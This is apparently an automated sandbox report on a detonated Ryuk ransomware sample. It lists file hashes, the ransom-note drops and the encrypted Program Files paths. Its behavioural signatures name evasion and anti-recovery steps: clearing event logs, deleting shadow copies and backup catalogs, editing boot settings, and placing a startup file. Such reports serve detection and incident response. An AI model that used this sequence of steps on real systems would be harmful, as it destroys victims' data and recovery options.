SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html

MD5 a641bf8ac8307aad57ecab53872e67db
SHA1 6fa8d69a859c34b8e75223ed8f426dbdf3d03df7
SHA256 9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
SHA512 7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\RyukReadMe.html.[[email protected]].RYK

MD5 3b1ed270feb9965830536509474cc811
SHA1 3d247ef3bca5dff8731a383bf09d8f02e57b1bca
SHA256 8908e9fa9e26bc051fca82a66dadff60c85b513786dcd8d84e5ca8b42eee5d19
SHA512 aeca2bd2faf1ce40853e12c20f98a08dbb873f763322347ded7ce62c30fb8d47b96481a27e1d5de22f4a6b7d23d47bfc6b3d853f87dca9959bcfd1d60215a713

Analysis: behavioral2

Detonation Overview

Submitted

2023-03-09 18:22

Reported

2023-03-09 18:24

Platform

win10v2004-20230220-en

Max time kernel

150s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"

Signatures

Ryuk

ransomware ryuk

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables taskbar notifications via registry modification

evasion

Disables use of System Restore points

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\selector.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File created C:\Program Files\RyukReadMe.html C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\db2v0801.xsl.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\en-gb\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_selected_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTest-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Trial-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\OneNote\prnSendToOneNote_win7.inf.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\local_policy.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\BLUECALM.ELM.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\or.pak.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.osmuxmui.msi.16.en-us.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_MAK-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\CSS7DATA000C.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ext.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_en_135x40.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sk_get.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\manifest.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MUOPTIN.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforsignature.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fa.pak.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f14\FA000000014.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\PREVIEW.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\cacerts.pem.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_hover_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\en-US\MSFT_PackageManagementSource.strings.psd1.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\plugin.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-100.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\TransparentAdvertisers.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_KMS_ClientC2R-ul.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ul-phn.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL011.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\selector.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Extreme Shadow.eftx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
